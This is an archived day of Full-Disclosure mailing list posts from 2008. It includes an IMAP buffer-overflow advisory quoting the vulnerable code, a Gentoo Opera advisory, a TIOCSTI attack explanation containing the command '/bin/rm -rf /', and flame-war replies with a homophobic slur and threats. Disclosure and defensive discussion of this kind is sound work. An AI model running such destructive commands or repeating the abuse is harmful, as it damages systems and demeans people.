packer, and you probably wanna look at this registry entry, and...."

Think for a moment: how come Symantec can release a pattern only 3 hours
after they see the first sample - and they already know what their competitors
are calling the critter?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/2b67ccfc/attachment.bin 

From labs at bitsec.com  Mon Nov  3 11:55:24 2008
From: labs at bitsec.com (Bitsec Labs)
Date: Mon, 3 Nov 2008 12:55:24 +0100
Subject: [Full-disclosure] Bitsec Security Advisory: UW/Panda IMAP [dt]mail
	buffer overflow
Message-ID: <20081103115524.GA6409@aron-laptop>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===============================================================================
Bitsec Security Advisory:  UW/Panda IMAP [dt]mail buffer overflow    2008-11-03
===============================================================================

Applications   tmail/dmail in UW IMAP [2002-2007c], Panda IMAP, Alpine <= 2.00 

Discovered by  Aron Andersson <aron.andersson at bitsec.com>,
               Jan Sahlin <jan.sahlin at bitsec.com>
Researched by  Aron Andersson <aron.andersson at bitsec.com>

Reference      http://www.bitsec.com/en/rad/bsa-081103.txt
GPG Key        http://www.bitsec.com/labs.asc

Overview

  tmail and dmail are mail delivery agents that deliver mail to a user's INBOX
  or a designated folder, specified by the folder extension in the user+folder
  argument on the command line. If tmail is used for mail delivery from a
  process whose UID is not the destination user, it must be installed setuid
  root; dmail can be used when the process is run as the destination user.

Problem

  A vulnerability exists in both applications due to missing boundary checks on
  the folder extension argument from the command line. The bug can be exploited
  by overflowing a stack buffer via an overly long folder name.

  For tmail, this could allow for arbitrary code execution as the root user. As
  mentioned the vulnerability also exists for dmail, but the impact is a bit
  less critical since it usually runs as the recipient user and not root.

  Depending on the mailer daemon and configuration in use, this bug may also
  be remotely exploitable.

  The bug is caused by the following pieces of code:
  [tmail.c]
    char *getusername (char *s,char **t)
    {
      char tmp[MAILTMPLEN];
      if (*t = strchr (s,'+')) {    /* have a mailbox specifier? */
        *(*t)++ = '\0';             /* yes, tie off user name */
                                    /* user+ and user+INBOX same as user */
        if (!**t || !strcmp ("INBOX",ucase (strcpy (tmp,*t)))) *t = NIL;
      }
      return s;                     /* return user name */
    }

  [dmail.c]
    int deliver (FILE *f,unsigned long msglen,char *user)
    {
      MAILSTREAM *ds = NIL;
      char *s,*mailbox,tmp[MAILTMPLEN],path[MAILTMPLEN];
      STRING st;
      struct stat sbuf;
                                    /* have a mailbox specifier? */
      if (mailbox = strchr (user,'+')) {
        *mailbox++ = '\0';          /* yes, tie off user name */
        if (!*mailbox || !strcmp ("INBOX",ucase (strcpy (tmp,mailbox))))
          mailbox = NIL;            /* user+ and user+INBOX same as user */
      }
    (..)

  The user+folder command line argument reaches deliver() and getusername()
  through the char pointers 's' and 'user', respectively. The folder part is
  separated from the user and copied to the buffer 'tmp'. Since 'tmp' is placed
  on the stack, an overly long folder name can be used to overwrite stack data,
  including but not limited to the saved EIP.

Exploit
  
  A proof-of-concept exploit for this vulnerability has been developed but will
  not be publicly released until 2008-11-10, by which time it can be found at

    http://www.bitsec.com/en/rad/bsa-081103.c

Fix
  
  Upgrade to the latest version from your IMAP vendor:

  - UW IMAP: 2007d
    http://www.washington.edu/imap/

  - Panda IMAP: tmail ver 2008.24, dmail ver 2008.19  
    http://www.panda.com/imap/

  - Alpine: No fix, tmail/dmail users should get UW IMAP 2007d
    http://www.washington.edu/alpine/

Disclosure Timeline

  2008-10-24 Notified developers (Mark Crispin, Steve Hubert)
  2008-10-27 Received response from developers
  2008-10-27 Panda IMAP patched
  2008-10-30 UW IMAP patched
  2008-11-03 Public release

===============================================================================
Bitsec Security Advisory:  UW/Panda IMAP [dt]mail buffer overflow    2008-11-03
===============================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFJDuPnzx20c5GX95oRApDFAKCLzTOOPmHsoGCcgxkbZvtCSFQujgCgugO/
yjilZ4XHBYXTPEXbVVnS7Rk=
=OsgS
-----END PGP SIGNATURE-----



From Simon.Richter at hogyros.de  Mon Nov  3 14:42:02 2008
From: Simon.Richter at hogyros.de (Simon Richter)
Date: Mon, 3 Nov 2008 15:42:02 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
Message-ID: <20081103144201.GA3847@richter>

Hi,

> does anyone have good ideas on how to secure our computers better? is
> it a problem at the user end, or a problem at the corporate and
> government end?

It's a problem at the geek end, i.e. with the people who actually build the
systems. We like our systems to be incredibly customizeable and powerful,
so we build them this way.

For example, when the X Window System reports an input event to an
application, a flag tells the app whether the event is "synthetic", i.e.
was generated by another program rather than directly by the user. The
mighty xterm knows to ignore such events and offers me a "secure input
mode" where it grabs the keyboard so it can bypass any filtering programs
(such as my window manager, which filters out Ctrl-T as the command key,
and generates a synthetic Ctrl-T for the "Ctrl-T t" sequence).

Now, people have felt the desire to automate various tasks in secure
applications, and created the XTest extension that allows a client that
knows about the extension to generate events with "synthetic" set to false.

The danger is not that any of the technologies here is inherently insecure,
it is that their combination is. And this is the way to more secure
computing: isolation by default.

Of course, that is not "convergence", not "Web 2.0". And certainly not
sexy.

   Simon
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 315 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/a09fdd5c/attachment.bin 

From mcwidget at gmail.com  Mon Nov  3 16:39:15 2008
From: mcwidget at gmail.com (mcwidget)
Date: Mon, 3 Nov 2008 16:39:15 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
References: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
Message-ID: <4e324cb0811030839s3388ab5fve04ba7b546b185a2@mail.gmail.com>

>
> The suggestion you made mcwidget is pretty much (I'm very sad to agree)
> 'just not worth it'...
>

Like I said, there are problems with this :)

My original point, which has become a bit lost in this discussion, was that
'fixing the user' is a very difficult goal to achieve and other methods to
improve home PC security should be looked at.  The suggestion of a 'NAP
enabled router' was meant as an example of how other devices in the home
that users are less likely to 'screw around with' could be used to increase
the overall security of the user .  NAP may or may not be helpful here but
there may be ways that the home router could be utilised better?

This is getting offtopic for FD though.  Happy to continue this off list.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/8b9f642e/attachment.html 

From xploitable at gmail.com  Mon Nov  3 17:00:05 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 17:00:05 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
Message-ID: <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>

i have a power base of nearly 5000 members on the n3td3v mailing list,
and i don't work for the government but i very much believe in what
the uk intelligence services are doing. so i suggest you don't fuck
with n3td3v but its your choice at the end of the day. thank you and
good day.

On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> tl;dr
>
> now i am going back to my real job, doing real things and you can go back to
> playing with lego and waiting for your mother to bring in some sandwiches
> cut into triangles. without the crust.
>
> faggot.
>



From rysheve at gmail.com  Mon Nov  3 17:13:09 2008
From: rysheve at gmail.com (Chris Jeane)
Date: Mon, 3 Nov 2008 11:13:09 -0600
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
Message-ID: <c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>

"Power Base of nearly 5000 members"?!?  "i suggest you don't fuck
with n3td3v"?1?!?

Are you a super villian?

On Mon, Nov 3, 2008 at 11:00 AM, n3td3v <xploitable at gmail.com> wrote:

> i have a power base of nearly 5000 members on the n3td3v mailing list,
> and i don't work for the government but i very much believe in what
> the uk intelligence services are doing. so i suggest you don't fuck
> with n3td3v but its your choice at the end of the day. thank you and
> good day.
>
> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> > tl;dr
> >
> > now i am going back to my real job, doing real things and you can go back
> to
> > playing with lego and waiting for your mother to bring in some sandwiches
> > cut into triangles. without the crust.
> >
> > faggot.
> >
>
>  _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/d65521de/attachment.html 

From Valdis.Kletnieks at vt.edu  Mon Nov  3 17:20:47 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 12:20:47 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: Your message of "Mon, 03 Nov 2008 15:42:02 +0100."
	<20081103144201.GA3847@richter>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<20081103144201.GA3847@richter>
Message-ID: <82823.1225732847@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 15:42:02 +0100, Simon Richter said:

> For example, when the X Window System reports an input event to an
> application, a flag tells the app whether the event is "synthetic", i.e.
> was generated by another program rather than directly by the user. The
> mighty xterm knows to ignore such events and offers me a "secure input
> mode" where it grabs the keyboard so it can bypass any filtering programs
> (such as my window manager, which filters out Ctrl-T as the command key,
> and generates a synthetic Ctrl-T for the "Ctrl-T t" sequence).
> 
> Now, people have felt the desire to automate various tasks in secure
> applications, and created the XTest extension that allows a client that
> knows about the extension to generate events with "synthetic" set to false.

And the worst part is that the people who designed that either knew, or should
have known, about the large number of Unix vulnerabilities in the pre-X,
ascii-green-screen world 5 years or so before, which all basically boiled down to:

1) Detach yourself from the current terminal
2) Open a victim's terminal (and thus inheriting that terminal as your
"control terminal"
3) Use the TIOCSTI ioctl to input characters as if typed on the control
terminal.  "/bin/rm -rf / \n" or similar.

It turns out that making the terminal mode 0600 when the user logs in isn't
always sufficient, due to how difficult it is to create a working revoke().

Oh - the original use for TIOCSTI was semi-reasonable - it was so that
programs like /usr/bin/mail could pre-populate a To: or cc: line for you
as if you had entered it, and then you could use the line-editing characters
for any changes you wanted to make...

Google for 'TIOCSTI' 'security' for some of the gory details.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/001c75d6/attachment.bin 

From xploitable at gmail.com  Mon Nov  3 17:34:22 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 17:34:22 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
Message-ID: <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>

im not a criminal... you seem to have your wires crossed.

On Mon, Nov 3, 2008 at 5:13 PM, Chris Jeane <rysheve at gmail.com> wrote:
> "Power Base of nearly 5000 members"?!?  "i suggest you don't fuck
> with n3td3v"?1?!?
>
> Are you a super villian?
>
> On Mon, Nov 3, 2008 at 11:00 AM, n3td3v <xploitable at gmail.com> wrote:
>>
>> i have a power base of nearly 5000 members on the n3td3v mailing list,
>> and i don't work for the government but i very much believe in what
>> the uk intelligence services are doing. so i suggest you don't fuck
>> with n3td3v but its your choice at the end of the day. thank you and
>> good day.
>>
>> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>> > tl;dr
>> >
>> > now i am going back to my real job, doing real things and you can go
>> > back to
>> > playing with lego and waiting for your mother to bring in some
>> > sandwiches
>> > cut into triangles. without the crust.
>> >
>> > faggot.
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From anonymouspimp at gmail.com  Mon Nov  3 17:31:18 2008
From: anonymouspimp at gmail.com (anonymous pimp)
Date: Mon, 3 Nov 2008 19:31:18 +0200
Subject: [Full-disclosure] Odays offers
In-Reply-To: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
Message-ID: <2d792fb20811030931u5499bbeelb46bd184f56566fd@mail.gmail.com>

You're proposing them? You're suggesting them?

There's no question, what do you expect us to answer privately?



From xploitable at gmail.com  Mon Nov  3 18:43:17 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 18:43:17 +0000
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
Message-ID: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>

---------- Forwarded message ----------
From: n3td3v <xploitable at gmail.com>
Date: Mon, Nov 3, 2008 at 1:15 PM
Subject: 0day auctions, should they be outlawed?
To: n3td3v <n3td3v at googlegroups.com>


i'll be lobbying soon to outlaw 0day auctions, this means the banning
of 0day sales on the internet. i've noticed an increased level in 0day
sales lately on mailing lists, and web sites... i think this should be
against the law. let me know what your opinions are on this, so i can
form what im going to say when i lobby people about it. cheers.



From xploitable at gmail.com  Mon Nov  3 18:59:05 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 18:59:05 +0000
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <20081103184957.GB5218@mail.msys.ch>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
	<4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
	<20081103184957.GB5218@mail.msys.ch>
Message-ID: <4b6ee9310811031059lfa45b3du78f914064f713d2a@mail.gmail.com>

On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer <marc at msys.ch> wrote:
> * n3td3v wrote:
>> ---------- Forwarded message ----------
>> From: n3td3v <xploitable at gmail.com>
>> Date: Mon, Nov 3, 2008 at 1:15 PM
>> Subject: 0day auctions, should they be outlawed?
>> To: n3td3v <n3td3v at googlegroups.com>
>>
>>
>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>> of 0day sales on the internet. i've noticed an increased level in 0day
>> sales lately on mailing lists, and web sites... i think this should be
>> against the law. let me know what your opinions are on this, so i can
>> form what im going to say when i lobby people about it. cheers.
>
> wrong approach.  there should be a law that the state has to buy
> all 0days and publish them here on undisclosure.  that would be
> good use of tax money... ;)
>

the latest guy put up an alias that says "anti security" and i guess
demanded money to make the 0day be known, and then there is still no
guarantee that the affected vendor or the government is going to get
wind of the exploit. that means, there is going to need to be a
government task force in place to infiltrate these sales, to make sure
the good guys are getting the info before blackhat elements. is there
already a government strike force in place to buy these "0day offers"?
or are the government sitting on their hand as per usual? im becoming
increasingly frustrated about what is going on. cheers.



From bigsandyvagina at gmail.com  Mon Nov  3 18:54:20 2008
From: bigsandyvagina at gmail.com (Sandy Vagina)
Date: Mon, 3 Nov 2008 10:54:20 -0800
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
	<4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
Message-ID: <e7d032a60811031054hc38cdbr7ef969046279b755@mail.gmail.com>

And by "lobbying", you mean continuing to whine on the full-disclosure list?

Sandy

On 11/3/08, n3td3v <xploitable at gmail.com> wrote:
> i'll be lobbying soon to outlaw 0day auctions, this means the banning
> of 0day sales on the internet. i've noticed an increased level in 0day
> sales lately on mailing lists, and web sites... i think this should be
> against the law. let me know what your opinions are on this, so i can
> form what im going to say when i lobby people about it. cheers.



From debasis.mohanty.listmails at gmail.com  Mon Nov  3 18:58:39 2008
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Date: Tue, 4 Nov 2008 00:28:39 +0530
Subject: [Full-disclosure] RealPlayer ierpplug.dll ActiveX Control BO
	(CVE-2007-5601) Exploit
Message-ID: <490f49e9.034c6e0a.1932.2998@mx.google.com>

Although can't release the exploit code for obvious reasons but thought of
putting a video will be a good thing. 

Check for a bindshell exploit demo for RealPlayer ierpplug.dll ActiveX
Control BO (CVE-2007-5601) vulnerability: 
http://coffeeandsecurity.com/resources.aspx


-d






From marc at msys.ch  Mon Nov  3 18:49:57 2008
From: marc at msys.ch (Marc Balmer)
Date: Mon, 3 Nov 2008 19:49:57 +0100
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
	<4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
Message-ID: <20081103184957.GB5218@mail.msys.ch>

* n3td3v wrote:
> ---------- Forwarded message ----------
> From: n3td3v <xploitable at gmail.com>
> Date: Mon, Nov 3, 2008 at 1:15 PM
> Subject: 0day auctions, should they be outlawed?
> To: n3td3v <n3td3v at googlegroups.com>
> 
> 
> i'll be lobbying soon to outlaw 0day auctions, this means the banning
> of 0day sales on the internet. i've noticed an increased level in 0day
> sales lately on mailing lists, and web sites... i think this should be
> against the law. let me know what your opinions are on this, so i can
> form what im going to say when i lobby people about it. cheers.

wrong approach.  there should be a law that the state has to buy
all 0days and publish them here on undisclosure.  that would be
good use of tax money... ;)



From keytoaster at gentoo.org  Mon Nov  3 18:50:10 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Mon, 03 Nov 2008 19:50:10 +0100
Subject: [Full-disclosure] [ GLSA 200811-01 ] Opera: Multiple vulnerabilities
Message-ID: <490F47E2.7020903@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200811-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Opera: Multiple vulnerabilities
      Date: November 03, 2008
      Bugs: #235298, #240500, #243060, #244980
        ID: 200811-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Opera, allowing for
the execution of arbitrary code.

Background
==========

Opera is a fast web browser that is available free of charge.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  www-client/opera       < 9.62                             >= 9.62

Description
===========

Multiple vulnerabilities have been discovered in Opera:

* Opera does not restrict the ability of a framed web page to change
  the address associated with a different frame (CVE-2008-4195).

* Chris Weber (Casaba Security) discovered a Cross-site scripting
  vulnerability (CVE-2008-4196).

* Michael A. Puls II discovered that Opera can produce argument
  strings that contain uninitialized memory, when processing custom
  shortcut and menu commands (CVE-2008-4197).

* Lars Kleinschmidt discovered that Opera, when rendering an HTTP
  page that has loaded an HTTPS page into a frame, displays a padlock
  icon and offers a security information dialog reporting a secure
  connection (CVE-2008-4198).

* Opera does not prevent use of links from web pages to feed source
  files on the local disk (CVE-2008-4199).

* Opera does not ensure that the address field of a news feed
  represents the feed's actual URL (CVE-2008-4200).

* Opera does not check the CRL override upon encountering a
  certificate that lacks a CRL (CVE-2008-4292).

* Chris (Matasano Security) reported that Opera may crash if it is
  redirected by a malicious page to a specially crafted address
  (CVE-2008-4694).

* Nate McFeters reported that Opera runs Java applets in the context
  of the local machine, if that applet has been cached and a page can
  predict the cache path for that applet and load it from the cache
  (CVE-2008-4695).

* Roberto Suggi Liverani (Security-Assessment.com) reported that
  Opera's History Search results does not escape certain constructs
  correctly, allowing for the injection of scripts into the page
  (CVE-2008-4696).

* David Bloom reported that Opera's Fast Forward feature incorrectly
  executes scripts from a page held in a frame in the outermost page
  instead of the page the JavaScript URL was located (CVE-2008-4697).

* David Bloom reported that Opera does not block some scripts when
  previewing a news feed (CVE-2008-4698).

* Opera does not correctly sanitize content when certain parameters
  are passed to Opera's History Search, allowing scripts to be injected
  into the History Search results page (CVE-2008-4794).

* Opera's links panel incorrectly causes scripts from a page held in
  a frame to be executed in the outermost page instead of the page
  where the URL was located (CVE-2008-4795).

Impact
======

These vulnerabilties allow remote attackers to execute arbitrary code,
to run scripts injected into Opera's History Search with elevated
privileges, to inject arbitrary web script or HTML into web pages, to
manipulate the address bar, to change Opera's preferences, to determine
the validity of local filenames, to read cache files, browsing history,
and subscribed feeds or to conduct other attacks.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Opera users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/opera-9.62"

References
==========

  [ 1 ] CVE-2008-4195
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4195
  [ 2 ] CVE-2008-4196
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4196
  [ 3 ] CVE-2008-4197
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197
  [ 4 ] CVE-2008-4198
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4198
  [ 5 ] CVE-2008-4199
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4199
  [ 6 ] CVE-2008-4200
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4200
  [ 7 ] CVE-2008-4292
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4292
  [ 8 ] CVE-2008-4694
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4694
  [ 9 ] CVE-2008-4695
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4695
  [ 10 ] CVE-2008-4696
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4696
  [ 11 ] CVE-2008-4697
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4697
  [ 12 ] CVE-2008-4698
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4698
  [ 13 ] CVE-2008-4794
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4794
  [ 14 ] CVE-2008-4795
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4795

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200811-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/35efa626/attachment.bin 

From ureleet at gmail.com  Mon Nov  3 19:19:59 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:19:59 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
Message-ID: <6158bb410811031119le633df7v7eace516aa270a48@mail.gmail.com>

u actually had a descent thread going there andrew!  congratz!  then u
tried to stick ur "5000 member n3td3v mailing list" dick out there and
u fucked it up.  shutup about ur little mailing list.  goddamn it.
its all ppl watching you 2 see what moronic shit u r going 2 say next.

damn it, why do u have to fuck up every discussion!?

On Mon, Nov 3, 2008 at 12:00 PM, n3td3v <xploitable at gmail.com> wrote:
> i have a power base of nearly 5000 members on the n3td3v mailing list,
> and i don't work for the government but i very much believe in what
> the uk intelligence services are doing. so i suggest you don't fuck
> with n3td3v but its your choice at the end of the day. thank you and
> good day.
>
> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>> tl;dr
>>
>> now i am going back to my real job, doing real things and you can go back to
>> playing with lego and waiting for your mother to bring in some sandwiches
>> cut into triangles. without the crust.
>>
>> faggot.
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Mon Nov  3 19:17:46 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:17:46 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
	<4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
Message-ID: <6158bb410811031117t637e8281hd2529d81f311009b@mail.gmail.com>

they wont be, and they cant be outlawed.  fight a fight worth
fighting.  cause this is 1 u cant.

On Mon, Nov 3, 2008 at 1:43 PM, n3td3v <xploitable at gmail.com> wrote:
> ---------- Forwarded message ----------
> From: n3td3v <xploitable at gmail.com>
> Date: Mon, Nov 3, 2008 at 1:15 PM
> Subject: 0day auctions, should they be outlawed?
> To: n3td3v <n3td3v at googlegroups.com>
>
>
> i'll be lobbying soon to outlaw 0day auctions, this means the banning
> of 0day sales on the internet. i've noticed an increased level in 0day
> sales lately on mailing lists, and web sites... i think this should be
> against the law. let me know what your opinions are on this, so i can
> form what im going to say when i lobby people about it. cheers.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Mon Nov  3 19:24:16 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:24:16 -0500
Subject: [Full-disclosure] Comments on: Security Bites 119: Does the
	Internet need its own Interpol?
In-Reply-To: <4b6ee9310810241755q1eb09da2j5d6637a44b284c14@mail.gmail.com>
References: <4b6ee9310810241540j61ad1c65m383a66eb21c44af2@mail.gmail.com>
	<4b6ee9310810241610u709d5d88p15b9d1c2924a97ca@mail.gmail.com>
	<296a304a0810241635u3c7564d5s8e0fa31e0f132935@mail.gmail.com>
	<4b6ee9310810241755q1eb09da2j5d6637a44b284c14@mail.gmail.com>
Message-ID: <6158bb410811031124m79fe462ci63dff71bfb1d6b08@mail.gmail.com>

stop deflecting.

On Fri, Oct 24, 2008 at 7:55 PM, n3td3v <xploitable at gmail.com> wrote:
> can we get back to talking about the interpol idea and less about who
> is a troll and who isn't, let's stay focused.
>
> On Sat, Oct 25, 2008 at 12:35 AM, waveroad waveroad <waveroad at gmail.com> wrote:
>> why do you troll the fd dude ?
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Mon Nov  3 19:21:52 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:21:52 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
	<4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
Message-ID: <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>

no, but u r insane.

http://www.ubergeek.tv/article.php?pid=54

id say this was n3td3v, but i dont think hes that cool

hes n3td3v, and hes a supervillian.

btw -- it was nice and sane and quiet on the list for like a week
without you here.  go back 2 wherever you were.

On Mon, Nov 3, 2008 at 12:34 PM, n3td3v <xploitable at gmail.com> wrote:
> im not a criminal... you seem to have your wires crossed.
>
